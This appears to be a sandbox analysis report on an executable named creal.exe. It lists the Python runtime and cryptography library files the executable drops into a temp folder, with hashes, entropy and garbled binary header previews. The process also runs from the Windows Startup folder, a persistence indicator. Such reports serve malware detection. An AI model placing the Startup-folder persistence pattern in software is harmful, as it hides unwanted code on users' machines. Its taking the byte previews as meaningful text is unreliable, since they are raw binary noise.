                                                                                                                                                                                                              SHA-256:CDC09FBAE2F103196215FACD50D108BE3EFF60C8EE5795DCC80BF57A0F120CDF
                                                                                                                                                                                                              SHA-512:3F9CB64B4456438DEA82A0638E977F233FAF0A08433F01CA87BA65C7E80B0680B0EC3009FA146F02AE1FDCC56271A66D99855D222E77B59A1713CAF952A807DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W,.6B..6B..6B..N..6B..IC..6B..IG..6B..IF..6B..IA..6B...C..6B..NC..6B..6C..6B...O..6B...B..6B......6B...@..6B.Rich.6B.........PE..d....Are.........." ...%............0................................................p....`......................................... ...P...p............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata..D.... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\python3.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68376
                                                                                                                                                                                                              Entropy (8bit):6.148687003588085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:/BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM8:pDmF61JFn+/OJBIpL0j7Sy5xH
                                                                                                                                                                                                              MD5:4038AF0427BCE296CA8F3E98591E0723
                                                                                                                                                                                                              SHA1:B2975225721959D87996454D049E6D878994CBF2
                                                                                                                                                                                                              SHA-256:A5BB3EB6FDFD23E0D8B2E4BCCD6016290C013389E06DAAE6CB83964FA69E2A4F
                                                                                                                                                                                                              SHA-512:DB762442C6355512625B36F112ECA6923875D10AAF6476D79DC6F6FFC9114E8C7757AC91DBCD1FB00014122BC7F656115160CF5D62FA7FA1BA70BC71346C1AD3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T...5e..5e..5e..m..5e..e..5e.....5e..g..5e.Rich.5e.........PE..d....Are.........." ...%..................................................................`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\python312.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7003928
                                                                                                                                                                                                              Entropy (8bit):5.780799677504345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:2OUmnjqB6bHMYM3RNgqKutvDHDMiEtYkzuv:2OUmn+MnM3R+qYi3kzuv
                                                                                                                                                                                                              MD5:48EBFEFA21B480A9B0DBFC3364E1D066
                                                                                                                                                                                                              SHA1:B44A3A9B8C585B30897DDC2E4249DFCFD07B700A
                                                                                                                                                                                                              SHA-256:0CC4E557972488EB99EA4AEB3D29F3ADE974EF3BCD47C211911489A189A0B6F2
                                                                                                                                                                                                              SHA-512:4E6194F1C55B82EE41743B35D749F5D92A955B219DECACF9F1396D983E0F92AE02089C7F84A2B8296A3062AFA3F9C220DA9B7CD9ED01B3315EA4A953B4ECC6CE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e..e..e.d..e....e.`..e.a..e.f..e....e..d..e..d...e.Bh.r.e.Be..e.B...e.Bg..e.Rich..e.................PE..d....Are.........." ...%..)..RB.....|X........................................k.......k...`......................................... .O.d....[P......@j.......`..Y....j../...Pj.4Z...3.T.....................I.(.....3.@............0)..............................text...v.).......)................. ..`.rdata...P'..0)..R'...).............@..@.data....<....P......nP.............@....pdata...Y....`..Z...._.............@..@PyRuntim.....0c......Hb.............@....rsrc........@j......Ji.............@..@.reloc..4Z...Pj..\...Ti.............@..B................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\pywin32_system32\pywintypes312.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                              SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\select.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30488
                                                                                                                                                                                                              Entropy (8bit):6.584443317757654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:OyLTFInPLnIloHqP3DT90IBIpQG28HQIYiSy1pCQ5mrUAM+o/8E9VF0NyOYl:hinzfHqv1rBIpQG/5YiSyvkrUAMxkErl
                                                                                                                                                                                                              MD5:E1604AFE8244E1CE4C316C64EA3AA173
                                                                                                                                                                                                              SHA1:99704D2C0FA2687997381B65FF3B1B7194220A73
                                                                                                                                                                                                              SHA-256:74CCA85600E7C17EA6532B54842E26D3CAE9181287CDF5A4A3C50AF4DAB785E5
                                                                                                                                                                                                              SHA-512:7BF35B1A9DA9F1660F238C2959B3693B7D9D2DA40CF42C6F9EBA2164B73047340D0ADFF8995049A2FE14E149EBA05A5974EEE153BADD9E8450F961207F0B3D42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d....Are.........." ...%.....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\sqlite3.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1500440
                                                                                                                                                                                                              Entropy (8bit):6.5886408023548295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:ATqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFq++I:nk0jwv4tP5kf8ar/74EF2/An4acrVUc2
                                                                                                                                                                                                              MD5:31CD2695493E9B0669D7361D92D46D94
                                                                                                                                                                                                              SHA1:19C1BC5C3856665ECA5390A2F9CD59B564C0139B
                                                                                                                                                                                                              SHA-256:17D547994008F1626BE2877497912687CB3EBD9A407396804310FD12C85AEAD4
                                                                                                                                                                                                              SHA-512:9DD8D1B900999E8CEA91F3D5F3F72D510F9CC28D7C6768A4046A9D2AA9E78A6ACE1248EC9574F5F6E53A6F1BDBFDF153D9BF73DBA05788625B03398716C87E1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d....Bre.........." ...%..................................................................`..........................................d...".............................../..........P...T...............................@...............@............................text...x........................... ..`.rdata..f...........................@..@.data....G.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\unicodedata.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1137944
                                                                                                                                                                                                              Entropy (8bit):5.4622357236004175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:PrEHdcM6hb1CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciA0:PrEXQCjfk7bPNfv42BN6yzUiA0
                                                                                                                                                                                                              MD5:FC47B9E23DDF2C128E3569A622868DBE
                                                                                                                                                                                                              SHA1:2814643B70847B496CBDA990F6442D8FF4F0CB09
                                                                                                                                                                                                              SHA-256:2A50D629895A05B10A262ACF333E7A4A31DB5CB035B70D14D1A4BE1C3E27D309
                                                                                                                                                                                                              SHA-512:7C08683820498FDFF5F1703DB4AD94AD15F2AA877D044EDDC4B54D90E7DC162F48B22828CD577C9BB1B56F7C11F777F9785A9DA1867BF8C0F2B6E75DC57C3F53
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d....Are.........." ...%.>..........`*.......................................p...... A....`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data...X.... ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\win32\win32api.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):133632
                                                                                                                                                                                                              Entropy (8bit):5.851293297484796
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
                                                                                                                                                                                                              MD5:3A80FEA23A007B42CEF8E375FC73AD40
                                                                                                                                                                                                              SHA1:04319F7552EA968E2421C3936C3A9EE6F9CF30B2
                                                                                                                                                                                                              SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                                                                                              SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_ARC4.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11264
                                                                                                                                                                                                              Entropy (8bit):4.703513333396807
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                                                                                                                                                                              MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                                                                                                                                                                              SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                                                                                                                                                                              SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                                                                                                                                                                              SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_Salsa20.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                              Entropy (8bit):4.968452734961967
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
                                                                                                                                                                                                              MD5:371776A7E26BAEB3F75C93A8364C9AE0
                                                                                                                                                                                                              SHA1:BF60B2177171BA1C6B4351E6178529D4B082BDA9
                                                                                                                                                                                                              SHA-256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
                                                                                                                                                                                                              SHA-512:C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_chacha20.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                              Entropy (8bit):5.061461040216793
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                                                                                                                                                                              MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                                                                                                                                                                              SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                                                                                                                                                                              SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                                                                                                                                                                              SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_pkcs1_decode.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                              Entropy (8bit):5.236167046748013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
                                                                                                                                                                                                              MD5:D9E7218460AEE693BEA07DA7C2B40177
                                                                                                                                                                                                              SHA1:9264D749748D8C98D35B27BEFE6247DA23FF103D
                                                                                                                                                                                                              SHA-256:38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
                                                                                                                                                                                                              SHA-512:DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aes.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                              Entropy (8bit):6.558176937399355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                                                                                                                                                                              MD5:F751792DF10CDEED391D361E82DAF596
                                                                                                                                                                                                              SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                                                                                                                                                                              SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                                                                                                                                                                              SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15872
                                                                                                                                                                                                              Entropy (8bit):5.285191078037458
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                                                                                                                                                                              MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                                                                                                                                                                              SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                                                                                                                                                                              SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                                                                                                                                                                              SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                              Entropy (8bit):5.505471888568532
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                                                                                                                                                                              MD5:D2175300E065347D13211F5BF7581602
                                                                                                                                                                                                              SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                                                                                                                                                                              SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                                                                                                                                                                              SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20992
                                                                                                                                                                                                              Entropy (8bit):6.06124024160806
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                                                                                                                                                                              MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                                                                                                                                                                              SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                                                                                                                                                                              SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                                                                                                                                                                              SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cast.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25088
                                                                                                                                                                                                              Entropy (8bit):6.475467273446457
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                                                                                                                                                                              MD5:CF3C2F35C37AA066FA06113839C8A857
                                                                                                                                                                                                              SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                                                                                                                                                                              SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                                                                                                                                                                              SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cbc.pyd

